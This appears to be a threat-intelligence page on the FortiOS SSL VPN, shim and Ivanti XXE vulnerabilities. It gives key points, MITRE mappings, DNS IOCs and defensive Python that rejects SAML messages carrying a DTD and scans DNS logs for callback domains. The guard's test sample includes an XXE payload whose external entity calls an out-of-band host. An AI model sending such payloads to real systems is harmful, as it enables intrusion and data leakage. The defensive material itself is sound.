RCEs in FortiOS SSL VPN, ‘shim’; Latest Ivanti Flaw Possibly Exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024) – SOCRadar® Cyber Intelligence Inc.

Fortinet’s FortiOS SSL VPN is affected by a critical Remote Code Execution vulnerability (CVE-2024-21762) with public PoC exploits and reports of active exploitation, alongside related issues in Shim (CVE-2023-40547) and Ivanti (CVE-2024-22024). The report also highlights threat actor activity (Volt Typhoon) and broad exposure measured by Shadowserver scans, plus growing attention to vulnerability intelligence and mitigation measures. #CVE-2024-21762 #CVE-2023-40547 #CVE-2024-22024 #VoltTyphoon #FortiOS #Ivanti #Shadowserver

Keypoints

  • FortiOS SSL VPN vulnerability CVE-2024-21762 enables unauthenticated RCE via crafted requests (high CVSS score).
  • Affected FortiOS branches are 7.4, 7.2, 7.0, 6.4, 6.2, and 6.0 (Fortinet lists 7.6 as not affected); upgrading to a fixed release in the same branch is advised, and 6.0 has no fixed build and must be migrated.
  • Shadowserver scans indicate about 150,000 FortiOS/FortiProxy instances are vulnerable, with the US leading in count.
  • A PoC exploit for CVE-2024-21762 surfaced on hacker forums; a Python-based PoC is available on GitHub.
  • Volt Typhoon, a Chinese state-sponsored actor, has targeted FortiOS vulnerabilities; CISA KEV guidance emphasizes patching.
  • Shim security updates (CVE-2023-40547) fix a Secure Boot bypass risk across the Linux distributions that ship shim; six CVEs were addressed in shim 15.8.
  • Ivanti CVE-2024-22024 (XXE in the SAML component) is covered by a vendor advisory; active exploitation has been claimed in community chatter but is not confirmed; DNS-based IOCs (out-of-band callback domains) are listed below.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – FortiOS SSL VPN vulnerability CVE-2024-21762 enables unauthenticated attackers to execute RCE through maliciously crafted requests. Quote: “…It enables unauthenticated attackers to execute RCE through maliciously crafted requests…”
  • [T1059.006] Python – PoC for CVE-2024-21762 is provided as a Python script, used to interact with target systems via sockets and payloads. Quote: “…A PoC exploit in the form of a Python script is provided on GitHub, based on the researcher’s technical analysis…”
  • [T1542.001] Pre-OS Boot: System Firmware – Shim vulnerability CVE-2023-40547 could lead to Secure Boot bypass. Quote: “…could lead to Secure Boot bypass.”
  • [T1046] Network Service Scanning – Shadowserver’s scans are benign exposure measurement, not attacker activity, but the same internet-facing footprint is what adversaries enumerate before exploitation; Quote: “Nearly 150,000 FortiOS Devices Are Vulnerable to CVE-2024-21762.”
  • [T1190] Exploit Public-Facing Application – Ivanti CVE-2024-22024 XXE vulnerability in Ivanti products; Quote: “XML External Entity (XXE) vulnerability in the SAML component, impacting Ivanti products’ versions 9.x and 22.x.”
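
The XXE mapped above needs a DTD in the inbound SAML message, which a legitimate SAML Response never carries. The following is an added example, not code from SOCRadar or Ivanti: it decodes a base64 SAMLResponse form value the way a service provider would and refuses the document before any XML parsing if it declares a DOCTYPE or an entity. The SAML documents, the Collaborator-style hostname `abc123.oastify.com` and the function names are constructed for illustration.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Any DOCTYPE or entity declaration is grounds for rejection: XXE requires a
# DTD, and SAML 2.0 messages never legitimately contain one. Searching the raw
# bytes (rather than configuring the parser) is deliberately parser-agnostic.
# XML keywords are upper-case; IGNORECASE only makes the check stricter.
_DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

SAML_ASSERTION_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed XXE sample of the kind the DNS IOCs on this page suggest: the
# external entity points at an attacker-controlled out-of-band host, so a parser
# that resolves it leaks at least a DNS lookup. The hostname is made up.
MALICIOUS_SAML = b"""<?xml version="1.0"?>
<!DOCTYPE samlp:Response [
  <!ENTITY xxe SYSTEM "http://abc123.oastify.com/">
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Issuer>&xxe;</saml:Issuer>
</samlp:Response>"""

# Constructed benign Response with the same structure and no DTD.
BENIGN_SAML = b"""<?xml version="1.0"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:Issuer>https://idp.example.test/metadata</saml:Issuer>
</samlp:Response>"""


class UnsafeSamlResponse(ValueError):
    """Raised when a SAML Response is refused before parsing."""


def contains_dtd(xml_bytes: bytes) -> bool:
    """True if the document declares a DOCTYPE or an entity anywhere.

    This also fires on a marker inside a comment or CDATA section; for an
    inbound SAML message that is an acceptable false positive."""
    return _DTD_MARKER.search(xml_bytes) is not None


def encode_saml_response(xml_bytes: bytes) -> str:
    """Base64-encode a Response as it travels in the SAMLResponse POST field."""
    return base64.b64encode(xml_bytes).decode("ascii")


def parse_saml_issuer(saml_response_b64: str) -> str:
    """Decode a SAMLResponse form value and return its Issuer text.

    The DTD guard runs on the raw bytes before the XML parser sees them, so
    no entity, internal or external, is ever resolved."""
    raw = base64.b64decode(saml_response_b64, validate=True)
    if contains_dtd(raw):
        raise UnsafeSamlResponse("DOCTYPE/ENTITY declaration in SAML response")
    root = ET.fromstring(raw)
    issuer = root.find(f"{{{SAML_ASSERTION_NS}}}Issuer")
    if issuer is None or not issuer.text:
        raise UnsafeSamlResponse("missing Issuer element")
    return issuer.text.strip()


def is_rejected(saml_response_b64: str) -> bool:
    """Helper for tests: True if the guard refuses the message."""
    try:
        parse_saml_issuer(saml_response_b64)
    except UnsafeSamlResponse:
        return True
    return False


if __name__ == "__main__":
    print(parse_saml_issuer(encode_saml_response(BENIGN_SAML)))
    print("malicious rejected:", is_rejected(encode_saml_response(MALICIOUS_SAML)))
```

The guard deliberately does not depend on parser configuration. Disabling DTD loading in the XML library in use is still the correct fix for the parser itself; the byte-level check is the belt to that brace, and it is cheap enough to run on every inbound assertion.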

Indicators of Compromise

  • [Domain] Ivanti Pulse DNS queries – oastify.com, burptest.tssrt.de (oastify.com is the Burp Suite Collaborator out-of-band domain; callbacks use random per-payload subdomains, so match any name under the domain, and expect hits from scanners and pentesters as well as attackers)
  • [IP Address] DNS PTR query – 255.255.255.255.in-addr.arpa
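
Because the listed IOCs are DNS names rather than IP addresses, the place to look is resolver query logs from the segment the Ivanti gateway sits in. The following is an added example, not from SOCRadar or Ivanti: it scans resolver log lines for the two callback domains (by suffix, since Collaborator-style hosts use random subdomains) and the exact PTR name, and groups the hits per querying client for triage. The log layout and every line in the sample are constructed for illustration.

```python
import re
from typing import Dict, Iterable, List, Optional

# IOCs as listed on this page. Collaborator-style domains are reached through
# random per-payload subdomains, so the domains are matched by suffix; the PTR
# name is matched exactly.
IOC_DOMAINS = ("oastify.com", "burptest.tssrt.de")
IOC_EXACT_QNAMES = ("255.255.255.255.in-addr.arpa",)

# Constructed sample resolver log in an assumed "key=value" layout (not the
# format of any particular product). Lines 2, 4 and 5 should be reported;
# line 6 is a deliberate near-miss that a naive substring match would flag.
SAMPLE_LOG = """\
2024-02-09T10:12:31Z client=10.0.0.5 qtype=A qname=www.example.test.
2024-02-09T10:12:33Z client=10.0.0.5 qtype=A qname=k7f2z9.oastify.com.
2024-02-09T10:12:35Z client=10.0.0.7 qtype=AAAA qname=updates.example.test.
2024-02-09T10:12:36Z client=10.0.0.5 qtype=PTR qname=255.255.255.255.in-addr.arpa.
2024-02-09T10:12:40Z client=10.0.0.9 qtype=A qname=BURPTEST.TSSRT.DE
2024-02-09T10:12:41Z client=10.0.0.9 qtype=A qname=notoastify.com.
"""

_LINE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) qtype=(?P<qtype>\S+) qname=(?P<qname>\S+)$"
)


def normalize_qname(qname: str) -> str:
    """Strip the trailing root dot and fold case so comparisons are exact."""
    return qname.rstrip(".").lower()


def match_ioc(qname: str) -> Optional[str]:
    """Return the IOC a query name matches, or None.

    Suffix matching requires a label boundary ('.' + domain) so that a name
    like notoastify.com does not match oastify.com."""
    name = normalize_qname(qname)
    for exact in IOC_EXACT_QNAMES:
        if name == exact:
            return exact
    for domain in IOC_DOMAINS:
        if name == domain or name.endswith("." + domain):
            return domain
    return None


def scan_dns_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per log line whose query name matches an IOC."""
    hits = []
    for line in lines:
        m = _LINE.match(line.strip())
        if m is None:
            continue  # not in the assumed layout; skip rather than guess
        ioc = match_ioc(m["qname"])
        if ioc is None:
            continue
        hits.append({
            "ts": m["ts"],
            "client": m["client"],
            "qtype": m["qtype"],
            "qname": normalize_qname(m["qname"]),
            "ioc": ioc,
        })
    return hits


def hits_by_client(hits: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group matched IOCs per querying client; the gateway's own address
    querying a callback domain is the signal worth escalating."""
    grouped: Dict[str, List[str]] = {}
    for h in hits:
        grouped.setdefault(h["client"], []).append(h["ioc"])
    return grouped


if __name__ == "__main__":
    for h in scan_dns_log(SAMPLE_LOG.splitlines()):
        print(h)
    print(hits_by_client(scan_dns_log(SAMPLE_LOG.splitlines())))
```

In practice the client field should be restricted to the gateway's own source addresses; a hit from a workstation is far more likely to be an internal tester's Burp session than exploitation of the appliance.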

Read more: https://socradar.io/rces-in-fortios-ssl-vpn-shim-latest-ivanti-flaw-possibly-exploited-cve-2024-21762-cve-2023-40547-cve-2024-22024/